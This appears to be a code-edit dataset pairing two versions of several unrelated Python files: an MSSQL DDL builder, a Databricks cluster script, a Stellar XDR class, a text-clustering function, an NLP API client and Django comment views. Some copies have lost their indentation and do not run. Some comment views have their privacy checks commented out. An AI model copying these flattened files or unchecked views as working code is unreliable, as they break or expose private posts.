        return f"DROP TABLE {self.wrap_table(table)}"

    def compile_column_exists(self, table, column):
        """Query that returns a row iff *column* exists on *table*."""
        return f"SELECT 1 FROM sys.columns WHERE Name = N'{column}' AND Object_ID = Object_ID(N'{table}')"

    def get_current_schema(self, connection, table_name):
        """Return a bare Table object; no introspection is performed here."""
        return Table(table_name)

    def enable_foreign_key_constraints(self):
        """MSSQL does not allow a global way to enable foreign key constraints"""
        return ""

    def disable_foreign_key_constraints(self):
        """MSSQL does not allow a global way to disable foreign key constraints"""
        return ""
| from .Platform import Platform
from ..Table import Table
class MSSQLPlatform(Platform):
    """Compiles schema-builder operations into Microsoft SQL Server DDL."""
    # Column types whose DDL never carries an explicit length.
    types_without_lengths = [
        "integer",
        "big_integer",
        "tiny_integer",
        "small_integer",
        "medium_integer",
    ]
    # Builder type name -> SQL type keyword.
    # NOTE(review): several entries (MEDIUMINT, LONGBLOB, LONGTEXT, YEAR,
    # BOOLEAN, DOUBLE, JSON, GEOMETRY, POINT) are not native T-SQL types --
    # confirm intended behavior before relying on them.
    type_map = {
        "string": "VARCHAR",
        "char": "CHAR",
        "integer": "INT",
        "big_integer": "BIGINT",
        "tiny_integer": "TINYINT",
        "big_increments": "BIGINT IDENTITY",
        "small_integer": "SMALLINT",
        "medium_integer": "MEDIUMINT",
        "increments": "INT IDENTITY",
        "uuid": "CHAR",
        "binary": "LONGBLOB",
        "boolean": "BOOLEAN",
        "decimal": "DECIMAL",
        "double": "DOUBLE",
        "enum": "VARCHAR",
        "text": "TEXT",
        "float": "FLOAT",
        "geometry": "GEOMETRY",
        "json": "JSON",
        "jsonb": "LONGBLOB",
        "inet": "VARCHAR",
        "cidr": "VARCHAR",
        "macaddr": "VARCHAR",
        "long_text": "LONGTEXT",
        "point": "POINT",
        "time": "TIME",
        "timestamp": "DATETIME",
        "date": "DATE",
        "year": "YEAR",
        "datetime": "DATETIME",
        "tiny_increments": "TINYINT IDENTITY",
        "unsigned": "INT",
        "unsigned_integer": "INT",
    }
    # Nullability flag -> SQL fragment.
    premapped_nulls = {True: "NULL", False: "NOT NULL"}
    # Named default values -> SQL DEFAULT clause.
    premapped_defaults = {
        "current": " DEFAULT CURRENT_TIMESTAMP",
        "now": " DEFAULT NOW()",
        "null": " DEFAULT NULL",
    }
    def compile_create_sql(self, table):
        """Return the statements creating *table* plus any of its indexes."""
        sql = []
        sql.append(
            self.create_format().format(
                table=self.wrap_table(table.name),
                columns=", ".join(self.columnize(table.get_added_columns())).strip(),
                constraints=", "
                + ", ".join(self.constraintize(table.get_added_constraints(), table))
                if table.get_added_constraints()
                else "",
                foreign_keys=", "
                + ", ".join(
                    self.foreign_key_constraintize(table.name, table.added_foreign_keys)
                )
                if table.added_foreign_keys
                else "",
            )
        )
        if table.added_indexes:
            for name, index in table.added_indexes.items():
                sql.append(
                    "CREATE INDEX {name} ON {table}({column})".format(
                        name=index.name,
                        table=self.wrap_table(table.name),
                        column=",".join(index.column),
                    )
                )
        return sql
    def compile_alter_sql(self, table):
        """Return the statements applying every pending change on *table*."""
        sql = []
        if table.added_columns:
            sql.append(
                self.alter_format().format(
                    table=self.wrap_table(table.name),
                    columns="ADD "
                    + ", ".join(self.columnize(table.added_columns)).strip(),
                )
            )
        if table.changed_columns:
            sql.append(
                self.alter_format().format(
                    table=self.wrap_table(table.name),
                    columns="ALTER COLUMN "
                    + ", ".join(self.columnize(table.changed_columns)).strip(),
                )
            )
        if table.renamed_columns:
            for name, column in table.get_renamed_columns().items():
                sql.append(
                    self.rename_column_string(table.name, name, column.name).strip()
                )
        if table.dropped_columns:
            dropped_sql = []
            for name in table.get_dropped_columns():
                dropped_sql.append(self.drop_column_string().format(name=name).strip())
            sql.append(
                self.alter_format().format(
                    table=self.wrap_table(table.name),
                    columns="DROP COLUMN " + ", ".join(dropped_sql),
                )
            )
        if table.added_foreign_keys:
            for (
                column,
                foreign_key_constraint,
            ) in table.get_added_foreign_keys().items():
                cascade = ""
                if foreign_key_constraint.delete_action:
                    cascade += f" ON DELETE {self.foreign_key_actions.get(foreign_key_constraint.delete_action.lower())}"
                if foreign_key_constraint.update_action:
                    cascade += f" ON UPDATE {self.foreign_key_actions.get(foreign_key_constraint.update_action.lower())}"
                sql.append(
                    f"ALTER TABLE {self.wrap_table(table.name)} ADD "
                    + self.get_foreign_key_constraint_string().format(
                        clean_column=column,
                        constraint_name=foreign_key_constraint.constraint_name,
                        column=self.wrap_table(column),
                        table=table.name,
                        foreign_table=foreign_key_constraint.foreign_table,
                        foreign_column=self.wrap_table(
                            foreign_key_constraint.foreign_column
                        ),
                        cascade=cascade,
                    )
                )
        if table.dropped_foreign_keys:
            constraints = table.dropped_foreign_keys
            for constraint in constraints:
                sql.append(
                    f"ALTER TABLE {self.wrap_table(table.name)} DROP CONSTRAINT {constraint}"
                )
        if table.added_indexes:
            for name, index in table.added_indexes.items():
                sql.append(
                    "CREATE INDEX {name} ON {table}({column})".format(
                        name=index.name,
                        table=self.wrap_table(table.name),
                        column=",".join(index.column),
                    )
                )
        if table.removed_indexes:
            constraints = table.removed_indexes
            for constraint in constraints:
                sql.append(
                    f"DROP INDEX {self.wrap_table(table.name)}.{self.wrap_table(constraint)}"
                )
        if table.added_constraints:
            for name, constraint in table.added_constraints.items():
                if constraint.constraint_type == "unique":
                    sql.append(
                        f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} UNIQUE({','.join(constraint.columns)})"
                    )
                elif constraint.constraint_type == "fulltext":
                    # Full-text indexes are not handled for MSSQL.
                    pass
                elif constraint.constraint_type == "primary_key":
                    sql.append(
                        f"ALTER TABLE {self.wrap_table(table.name)} ADD CONSTRAINT {constraint.name} PRIMARY KEY ({','.join(constraint.columns)})"
                    )
        return sql
    def add_column_string(self):
        """Template for an added column inside an ALTER statement."""
        return "{name} {data_type}{length}"
    def drop_column_string(self):
        """Template for a dropped column inside an ALTER statement."""
        return "{name}"
    def rename_column_string(self, table, old, new):
        """Return the sp_rename call that renames *old* to *new* on *table*."""
        return f"EXEC sp_rename '{table}.{old}', '{new}', 'COLUMN'"
    def columnize(self, columns):
        """Render each column object into its full DDL fragment."""
        sql = []
        for name, column in columns.items():
            if column.length:
                length = self.create_column_length(column.column_type).format(
                    length=column.length
                )
            else:
                length = ""
            default = ""
            # A default of 0 is falsy, so it needs its own branch ahead of
            # the generic truthiness checks below.
            if column.default in (0,):
                default = f" DEFAULT {column.default}"
            elif column.default in self.premapped_defaults.keys():
                default = self.premapped_defaults.get(column.default)
            elif column.default:
                if isinstance(column.default, (str,)):
                    default = f" DEFAULT '{column.default}'"
                else:
                    default = f" DEFAULT {column.default}"
            else:
                default = ""
            constraint = ""
            column_constraint = ""
            if column.primary:
                constraint = " PRIMARY KEY"
            if column.column_type == "enum":
                # MSSQL has no ENUM; emulate it with a CHECK constraint.
                values = ", ".join(f"'{x}'" for x in column.values)
                column_constraint = f" CHECK([{column.name}] IN ({values}))"
            sql.append(
                self.columnize_string()
                .format(
                    name=column.name,
                    data_type=self.type_map.get(column.column_type, ""),
                    column_constraint=column_constraint,
                    length=length,
                    constraint=constraint,
                    nullable=self.premapped_nulls.get(column.is_null) or "",
                    default=default,
                )
                .strip()
            )
        return sql
    def columnize_string(self):
        """Template for a single column definition ([name] quoting style)."""
        return "[{name}] {data_type}{length} {nullable}{default}{column_constraint}{constraint}"
    def constraintize(self, constraints, table):
        """Render table-level constraints via their per-type templates."""
        sql = []
        for name, constraint in constraints.items():
            sql.append(
                getattr(
                    self, f"get_{constraint.constraint_type}_constraint_string"
                )().format(
                    columns=", ".join(constraint.columns),
                    name_columns="_".join(constraint.columns),
                    constraint_name=constraint.name,
                    table=table.name,
                )
            )
        return sql
    def get_table_string(self):
        """Template used to quote a table name."""
        return "[{table}]"
    def create_format(self):
        """Template for CREATE TABLE statements."""
        return "CREATE TABLE {table} ({columns}{constraints}{foreign_keys})"
    def alter_format(self):
        """Template for ALTER TABLE statements."""
        return "ALTER TABLE {table} {columns}"
    def get_foreign_key_constraint_string(self):
        """Template for a FOREIGN KEY constraint clause."""
        return "CONSTRAINT {constraint_name} FOREIGN KEY ({column}) REFERENCES {foreign_table}({foreign_column}){cascade}"
    def get_primary_key_constraint_string(self):
        """Template for a PRIMARY KEY constraint clause."""
        return "CONSTRAINT {constraint_name} PRIMARY KEY ({columns})"
    def get_unique_constraint_string(self):
        """Template for a UNIQUE constraint clause."""
        return "CONSTRAINT {constraint_name} UNIQUE ({columns})"
    def compile_table_exists(self, table, database):
        """Query that returns rows iff *table* exists."""
        return f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = '{table}'"
    def compile_truncate(self, table, foreign_keys=False):
        """TRUNCATE *table*, optionally disabling FK checks around it."""
        if not foreign_keys:
            return f"TRUNCATE TABLE {self.wrap_table(table)}"
        return [
            f"ALTER TABLE {self.wrap_table(table)} NOCHECK CONSTRAINT ALL",
            f"TRUNCATE TABLE {self.wrap_table(table)}",
            f"ALTER TABLE {self.wrap_table(table)} WITH CHECK CHECK CONSTRAINT ALL",
        ]
    def compile_rename_table(self, current_name, new_name):
        """Rename a table via sp_rename."""
        return f"EXEC sp_rename {self.wrap_table(current_name)}, {self.wrap_table(new_name)}"
    def compile_drop_table_if_exists(self, table):
        """DROP TABLE IF EXISTS statement."""
        return f"DROP TABLE IF EXISTS {self.wrap_table(table)}"
    def compile_drop_table(self, table):
        """DROP TABLE statement."""
        return f"DROP TABLE {self.wrap_table(table)}"
    def compile_column_exists(self, table, column):
        """Query that returns a row iff *column* exists on *table*."""
        return f"SELECT 1 FROM sys.columns WHERE Name = N'{column}' AND Object_ID = Object_ID(N'{table}')"
    def get_current_schema(self, connection, table_name):
        """Return a bare Table object; no introspection is performed here."""
        return Table(table_name)
    def enable_foreign_key_constraints(self):
        """MSSQL does not allow a global way to enable foreign key constraints"""
        return ""
    def disable_foreign_key_constraints(self):
        """MSSQL does not allow a global way to disable foreign key constraints"""
        return ""
|
import json
import requests
# curl -X GET -H "Authorization: Bearer [token]" https://[databricks url]/api/2.0/clusters/list
# Read deployment secrets and the desired cluster name from local config.
with open('config.json') as f:
    config = json.load(f)
secrets = config["secrets"]["databricks"]
cluster_name = config["configuration"]["cluster_name"]
# Ask the Databricks REST API (2.0) to create an autoscaling cluster.
# Inner quotes differ from the f-string's outer quotes so this parses on
# Python < 3.12.
response = requests.post(
    f"{secrets['url']}/api/2.0/clusters/create",
    headers={"Authorization": f"Bearer {secrets['token']}"},
    json={
        "cluster_name": cluster_name,
        "spark_version": "7.3.x-scala2.12",
        "node_type_id": "Standard_D3_v2",
        "autoscale": {
            "min_workers": 2,
            "max_workers": 8
        }
    }
)
if response.status_code == 200:
    print(response.json())
else:
    # Decode the body once; error responses carry error_code/message fields.
    error = response.json()
    print("Error launching cluster: %s: %s" % (error["error_code"], error["message"]))
| import json
import requests
# curl -X GET -H "Authorization: Bearer [token]" https://[databricks url]/api/2.0/clusters/list
# Read deployment secrets and the desired cluster name from local config.
with open('config.json') as f:
    config = json.load(f)
secrets = config["secrets"]["databricks"]
cluster_name = config["configuration"]["cluster_name"]
# Ask the Databricks REST API (2.0) to create an autoscaling cluster.
response = requests.post(
    f"{secrets['url']}/api/2.0/clusters/create",
    headers={"Authorization": f"Bearer {secrets['token']}"},
    json={
        "cluster_name": cluster_name,
        "spark_version": "7.3.x-scala2.12",
        "node_type_id": "Standard_D3_v2",
        "autoscale": {
            "min_workers": 2,
            "max_workers": 8
        }
    }
)
# 200 -> cluster metadata; anything else carries error_code/message fields.
if response.status_code == 200:
    print(response.json())
else:
    print("Error launching cluster: %s: %s" % (response.json()["error_code"], response.json()["message"]))
|
# This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from .asset import Asset
from .int64 import Int64
from .muxed_account import MuxedAccount
__all__ = ["PaymentOp"]
class PaymentOp:
"""
XDR Source Code
----------------------------------------------------------------
struct PaymentOp
{
MuxedAccount destination; // recipient of the payment
Asset asset; // what they end up with
int64 amount; // amount they end up with
};
----------------------------------------------------------------
"""
def __init__(
self,
destination: MuxedAccount,
asset: Asset,
amount: Int64,
) -> None:
self.destination = destination
self.asset = asset
self.amount = amount
def pack(self, packer: Packer) -> None:
self.destination.pack(packer)
self.asset.pack(packer)
self.amount.pack(packer)
@classmethod
def unpack(cls, unpacker: Unpacker) -> "PaymentOp":
destination = MuxedAccount.unpack(unpacker)
asset = Asset.unpack(unpacker)
amount = Int64.unpack(unpacker)
return cls(
destination=destination,
asset=asset,
amount=amount,
)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "PaymentOp":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "PaymentOp":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return (
self.destination == other.destination
and self.asset == other.asset
and self.amount == other.amount
)
def __str__(self):
out = [
f"destination={self.destination}",
f"asset={self.asset}",
f"amount={self.amount}",
]
return f"<PaymentOp {[", ".join(out)]}>"
| # This is an automatically generated file.
# DO NOT EDIT or your changes may be overwritten
import base64
from xdrlib import Packer, Unpacker
from .asset import Asset
from .int64 import Int64
from .muxed_account import MuxedAccount
__all__ = ["PaymentOp"]
class PaymentOp:
"""
XDR Source Code
----------------------------------------------------------------
struct PaymentOp
{
MuxedAccount destination; // recipient of the payment
Asset asset; // what they end up with
int64 amount; // amount they end up with
};
----------------------------------------------------------------
"""
def __init__(
self,
destination: MuxedAccount,
asset: Asset,
amount: Int64,
) -> None:
self.destination = destination
self.asset = asset
self.amount = amount
def pack(self, packer: Packer) -> None:
self.destination.pack(packer)
self.asset.pack(packer)
self.amount.pack(packer)
@classmethod
def unpack(cls, unpacker: Unpacker) -> "PaymentOp":
destination = MuxedAccount.unpack(unpacker)
asset = Asset.unpack(unpacker)
amount = Int64.unpack(unpacker)
return cls(
destination=destination,
asset=asset,
amount=amount,
)
def to_xdr_bytes(self) -> bytes:
packer = Packer()
self.pack(packer)
return packer.get_buffer()
@classmethod
def from_xdr_bytes(cls, xdr: bytes) -> "PaymentOp":
unpacker = Unpacker(xdr)
return cls.unpack(unpacker)
def to_xdr(self) -> str:
xdr_bytes = self.to_xdr_bytes()
return base64.b64encode(xdr_bytes).decode()
@classmethod
def from_xdr(cls, xdr: str) -> "PaymentOp":
xdr_bytes = base64.b64decode(xdr.encode())
return cls.from_xdr_bytes(xdr_bytes)
def __eq__(self, other: object):
if not isinstance(other, self.__class__):
return NotImplemented
return (
self.destination == other.destination
and self.asset == other.asset
and self.amount == other.amount
)
def __str__(self):
out = [
f"destination={self.destination}",
f"asset={self.asset}",
f"amount={self.amount}",
]
return f"<PaymentOp {[', '.join(out)]}>"
|
import chars2vec
import csv
from sklearn.cluster import SpectralClustering
def spectralClustering():
    """Embed the dataset words with chars2vec, spectral-cluster them, and
    report whether the last two entries land in the same cluster.

    Returns:
        bool: True when the final two rows share a cluster label.
    """
    collected = []
    # Single words: third column of datasetFit.csv (header row skipped).
    with open('./datasetFit.csv') as fit_file:
        for index, record in enumerate(csv.reader(fit_file, delimiter=',')):
            if index > 0:
                collected.append(record[2])
    # Word pairs: whole rows of datasetCouple.csv (header row skipped).
    with open('./datasetCouple.csv') as couple_file:
        for index, record in enumerate(csv.reader(couple_file, delimiter=',')):
            if index > 0:
                collected.append(record)
    # Normalise every non-empty entry to plain text: str() of a list looks
    # like "['a', 'b']", so brackets and quotes are stripped away.
    cleaned = []
    for entry in collected:
        if entry:
            text = str(entry)
            for unwanted in ("[", "]", "'"):
                text = text.replace(unwanted, "")
            cleaned.append(text)
    embedder = chars2vec.load_model('eng_50')
    vectors = embedder.vectorize_words(cleaned)
    model = SpectralClustering(n_clusters=9,
                               assign_labels="discretize",
                               random_state=0).fit(vectors)
    labels = model.labels_
    # The last two embeddings are the candidate pair.
    return bool(labels[-1] == labels[-2])
| import chars2vec
import csv
from sklearn.cluster import SpectralClustering
def spectralClustering():
words=[]
with open('./datasetFit.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
for row in csv_reader:
if line_count == 0:
#print(f'Column names are {", ".join(row)}')
line_count += 1
else:
words.append(row[2])
line_count += 1
with open('./datasetCouple.csv') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
line_count = 0
arrayDiStringhe=[]
for row in csv_reader:
if line_count == 0:
#print(f'Column names are {", ".join(row)}')
line_count += 1
else:
words.append(row)
line_count += 1
for i in range(len(words)):
if(words[i]):
stringa = str(words[i])
stringa = stringa.replace("[", "")
stringa = stringa.replace("]", "")
stringa = stringa.replace("'", "")
arrayDiStringhe.append(stringa)
c2v_model = chars2vec.load_model('eng_50')
word_embeddings = c2v_model.vectorize_words(arrayDiStringhe)
#print(word_embeddings)
#print(len(word_embeddings))
clustering = SpectralClustering(n_clusters=9,
assign_labels="discretize",
random_state=0).fit(word_embeddings)
labels=clustering.labels_
#print(labels)
l=len(labels)
if (labels[l-1]==labels[l-2]):
#print('TRUE')
return True
else:
#print('FALSE')
return False
|
import os
import inspect
from lib.apirequest import ApiRequest
class ApiCotoha():
def __init__(self, clientId, clientSecret):
self.__clientId = clientId
self.__clientSecret = clientSecret
def __access(self):
at = ApiRequest('https://api.ce-cotoha.com/v1/oauth/accesstokens', 'POST')
at.addHeader({'Content-Type':'application/json'})
at.addParam({
'grantType': 'client_credentials',
'clientId': self.__clientId,
'clientSecret': self.__clientSecret,
})
res = at.throw()
if not res:
print('cotoha auth is failed')
exit(1)
return res['access_token']
def __common(self, param):
target = inspect.currentframe().f_back.f_code.co_name
ar = ApiRequest(f'https://api.ce-cotoha.com/api/dev/nlp/v1/{target}', 'POST')
ar.addHeader({
'Content-Type' : 'application/json;charset=UTF-8',
'Authorization' : f"Bearer {self.__access()}",
})
ar.addParam(param)
res = ar.throw()
if not res:
return False
if res['status'] != 0:
print(f'status:{res['status']}')
print(f'message:{res['message']}')
return False
return res['result']
def keyword(self, document):
return self.__common(
{
'document': document,
'type' : 'kuzure',
'max_keyword_num' : 10,
}
)
def similarity(self, s1, s2):
return self.__common(
{
's1': s1,
's2': s2,
'type' : 'kuzure',
}
)
| import os
import inspect
from lib.apirequest import ApiRequest
class ApiCotoha():
def __init__(self, clientId, clientSecret):
self.__clientId = clientId
self.__clientSecret = clientSecret
def __access(self):
at = ApiRequest('https://api.ce-cotoha.com/v1/oauth/accesstokens', 'POST')
at.addHeader({'Content-Type':'application/json'})
at.addParam({
'grantType': 'client_credentials',
'clientId': self.__clientId,
'clientSecret': self.__clientSecret,
})
res = at.throw()
if not res:
print('cotoha auth is failed')
exit(1)
return res['access_token']
def __common(self, param):
target = inspect.currentframe().f_back.f_code.co_name
ar = ApiRequest(f'https://api.ce-cotoha.com/api/dev/nlp/v1/{target}', 'POST')
ar.addHeader({
'Content-Type' : 'application/json;charset=UTF-8',
'Authorization' : f"Bearer {self.__access()}",
})
ar.addParam(param)
res = ar.throw()
if not res:
return False
if res['status'] != 0:
print(f'status:{res["status"]}')
print(f'message:{res["message"]}')
return False
return res['result']
def keyword(self, document):
return self.__common(
{
'document': document,
'type' : 'kuzure',
'max_keyword_num' : 10,
}
)
def similarity(self, s1, s2):
return self.__common(
{
's1': s1,
's2': s2,
'type' : 'kuzure',
}
)
|
from django.db.models import Q
from rest_framework import status
from rest_framework.exceptions import NotAuthenticated, PermissionDenied
from rest_framework.permissions import AllowAny, IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from bumblebee.buzzes.utils import (
get_buzz_from_buzzid_or_raise,
get_rebuzz_from_rebuzzid_or_raise,
)
from bumblebee.comments.utils import (
get_comment_from_commentid_or_raise,
get_comments_from_commentid_list,
)
from bumblebee.core.exceptions import (
ExtraFieldsError,
MissingFieldsError,
NoneExistenceError,
UrlParameterError,
)
from bumblebee.core.helpers import (
RequestFieldsChecker,
create_200,
create_400,
create_500,
)
from bumblebee.core.permissions import IsCommentOwner
from bumblebee.notifications.choices import ACTION_TYPE, CONTENT_TYPE
from bumblebee.notifications.utils import create_notification, delete_notification
from ..serializers.comment_serializers import (
CommentDetailSerializer,
CreateCommentSerializer,
EditCommentSerializer,
)
##################################
## RETRIEVE
##################################
class BuzzOrRebuzzCommentListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def _get_comments(self, *args, **kwargs):
""" """
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
buzz_instance = self._get_url_buzz(url_buzzid)
return buzz_instance.buzz_comment.filter(level=1)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
return rebuzz_instance.rebuzz_comment.filter(level=1)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_comments()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get("username")}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentReplyListView(APIView):
"""
Get comments and interactions for a given buzz
"""
permission_classes = [AllowAny]
def _get_url_comment(self, url_commentid):
""" """
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz:
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
# elif comment_instance.parent_buzz:
# if comment_instance.parent_rebuzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private ReBuzz",
# code="User has made their rebuzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def _get_replies(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = self._get_url_comment(url_commentid)
replyid_list = comment_instance.comment_interaction.replies
if len(replyid_list) != 0:
replies = get_comments_from_commentid_list(replyid_list)
objects = replies["comments"].filter(level=comment_instance.level + 1)
return objects
else:
return None
def get(self, request, *args, **kwargs):
""" """
try:
comment_instances = self._get_replies()
comment_serializer = CommentDetailSerializer(comment_instances, many=True)
return Response(
comment_serializer.data,
status=status.HTTP_200_OK,
)
except (MissingFieldsError, UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get buzzes of `{kwargs.get("username")}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CommentDetailView(APIView):
""" """
permission_classes = [AllowAny]
def _get_url_comment(self, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
# if comment_instance.parent_buzz.author.profile.private:
# raise PermissionDenied(
# detail="Private Profile",
# code="User has made their profile private.",
# )
# if comment_instance.parent_buzz.privacy == "priv":
# raise PermissionDenied(
# detail="Private Buzz",
# code="User has made their buzz private.",
# )
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def get(self, request, *args, **kwargs):
""" """
try:
comment_instance = self._get_url_comment(**kwargs)
serializer = CommentDetailSerializer(comment_instance)
return Response(
serializer.data,
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not get details for comment `id: {kwargs.get("commentid")}` due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
# ##################################
# ## CREATE
# ##################################
class CreateCommentView(APIView):
""" """
serializer_class = CreateCommentSerializer
permission_classes = [IsAuthenticated]
def _get_url_buzz(self, url_buzzid):
""" """
if url_buzzid:
buzz_instance = get_buzz_from_buzzid_or_raise(buzzid=url_buzzid)
if buzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if buzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Buzz",
code="User has made their buzz private.",
)
return buzz_instance
else:
raise UrlParameterError(
"buzzid",
create_400(
400,
"Url Error",
"Url must contain `buzz id`",
),
)
def _get_url_rebuzz(self, url_rebuzzid):
""" """
if url_rebuzzid:
rebuzz_instance = get_rebuzz_from_rebuzzid_or_raise(rebuzzid=url_rebuzzid)
if rebuzz_instance.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if rebuzz_instance.privacy == "priv":
raise PermissionDenied(
detail="Private Rebuzz",
code="User has made their rebuzz private.",
)
return rebuzz_instance
else:
raise UrlParameterError(
"buzz or rebuzzid",
create_400(
400,
"Url Error",
"Url must contain `rebuzz id`",
),
)
def post(self, request, *args, **kwargs):
""" """
try:
data = request.data
# check either image or content
RequestFieldsChecker().check_at_least_one_field_or_raise(
data, ["content", "images"]
)
serializer = self.serializer_class(data=data)
serializer.is_valid(raise_exception=True)
url_buzzid = self.kwargs.get("buzzid", False)
url_rebuzzid = self.kwargs.get("rebuzzid", False)
if url_buzzid:
buzz_instance = self._get_url_buzz(url_buzzid)
created_comment = serializer.save(
commenter=request.user,
parent_buzz=buzz_instance,
level=1,
**serializer.validated_data,
)
interaction = buzz_instance.buzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["BUZZ"],
request.user,
buzz_instance,
created_comment,
)
elif url_rebuzzid:
rebuzz_instance = self._get_url_rebuzz(url_rebuzzid)
created_comment = serializer.save(
commenter=request.user,
parent_rebuzz=rebuzz_instance,
**serializer.validated_data,
)
interaction = rebuzz_instance.rebuzz_interaction
interaction.comments.append(created_comment.id)
interaction.save()
# create notification
create_notification(
ACTION_TYPE["CMNT"],
CONTENT_TYPE["RBZ"],
request.user,
rebuzz_instance,
created_comment,
)
return Response(
create_200(
status.HTTP_200_OK,
"Comment Created",
f"Comment created.\n {dict(commentid=created_comment.id, commenter=request.user.username)}",
),
status=status.HTTP_200_OK,
)
except (UrlParameterError, NoneExistenceError, MissingFieldsError) as error:
return Response(error.message, status=error.message.get("status"))
except (PermissionDenied, NotAuthenticated) as error:
return Response(
create_400(
error.status_code,
error.get_codes(),
error.get_full_details().get("message"),
),
status=error.status_code,
)
except Exception as error:
return Response(
create_500(
cause=error.args[0] or None,
verbose=f"Could not create comment due to an unknown error",
),
status=status.HTTP_500_INTERNAL_SERVER_ERROR,
)
class CreateCommentReplyView(APIView):
""" """
serializer_class = CreateCommentSerializer
permission_classes = [IsAuthenticated]
def _get_url_comment(self, *args, **kwargs):
""" """
url_commentid = self.kwargs.get("commentid", False)
if url_commentid:
comment_instance = get_comment_from_commentid_or_raise(
commentid=url_commentid
)
if comment_instance.parent_buzz:
if comment_instance.parent_buzz.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if comment_instance.parent_buzz.privacy == "priv":
raise PermissionDenied(
detail="Private Buzz",
code="User has made their buzz private.",
)
elif comment_instance.parent_rebuzz:
if comment_instance.parent_rebuzz.author.profile.private:
raise PermissionDenied(
detail="Private Profile",
code="User has made their profile private.",
)
if comment_instance.parent_rebuzz.privacy == "priv":
raise PermissionDenied(
detail="Private Rebuzz",
code="User has made their rebuzz private.",
)
return comment_instance
else:
raise UrlParameterError(
"commentid",
create_400(
400,
"Url Error",
"Url must contain `comment id`",
),
)
def post(self, request, *args, **kwargs):
""" """
try:
data = request.data
RequestFieldsChecker().check_at_least_one_field_or_raise(
data, ["content", "images"]
)
